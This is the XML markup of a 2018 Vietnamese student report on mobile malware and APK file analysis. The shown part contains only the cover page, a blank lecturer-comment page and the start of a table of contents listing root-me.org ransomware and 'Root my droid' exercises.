          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32B4B24D" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>MOBILE MALWARE – PHÂN TÍCH FILE APK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5928F54F" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1357C087" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
          <w:tab w:val="left" w:pos="5812"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>GVHD : ThS. PHẠM ĐÌNH THẮNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881B2F1" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
          <w:tab w:val="left" w:pos="5812"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>SV : TRẦN XUÂN THỜI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA8E5C" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
          <w:tab w:val="left" w:pos="5812"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>MSSV : 15DH110032</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F42BDA" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5812"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LỚP :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> AN1502</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47430829" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719CEF0C" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8B9D9D" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>THÀNH PHỐ HỒ CHÍ MINH – NĂM 2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A6C6D" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="002F62FD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NHẬN XÉT CỦA GIẢNG VIÊN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E43A7" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C61E09" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="002F62FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>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b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B0ADF"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575CF16A"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23A658A2"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3FA3129F"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6E0E3A72"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32E51BB4"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1A649EA3"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21268951" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="002F62FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="142"/>
          <w:tab w:val="left" w:leader="dot" w:pos="10348"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6EA172" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="002F62FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="142"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Điểm (số):                 Điểm (chữ): </w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>…………</w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55347505" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587A1C27" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="002F62FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tp.HCM, ngày 12 tháng 12 năm 2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F96EE1D" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C39C898" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD144F1" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4E7D3B" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="002F62FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ThS. Nguyễn Anh Vũ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60273CAA" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4F25BD" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6367B7A6" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFD3C0A" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F51237" w14:textId="7A3E7A02" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DBA67F" w14:textId="77777777" w:rsidR="00043F4A" w:rsidRPr="00447E87" w:rsidRDefault="00043F4A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C8A5DF" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00C576A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718FFFF9" w14:textId="77777777" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="002F62FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>MỤC LỤ</w:t>
      </w:r>
      <w:r w:rsidR="007637F7" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:id w:val="1026070515"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="5385E186" w14:textId="5BE9EF41" w:rsidR="00C45784" w:rsidRDefault="002F62FD">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00447E87">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00447E87">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:instrText>TOC \z \o "1-3" \u \h</w:instrText>
          </w:r>
          <w:r w:rsidR="00384EB1" w:rsidRPr="00447E87">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc533387039" w:history="1">
            <w:r w:rsidR="00C45784" w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 1. Bài tập trên trang root-me.org</w:t>
            </w:r>
            <w:r w:rsidR="00C45784">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C45784">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C45784">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387039 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C45784">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C45784">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C45784">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00C45784">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5229B9E7" w14:textId="6F958E2D" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387040" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Bài tập Ransome ware.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387040 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25CDC629" w14:textId="5FDDEF58" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387041" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Bài tập Root my droid.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387041 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
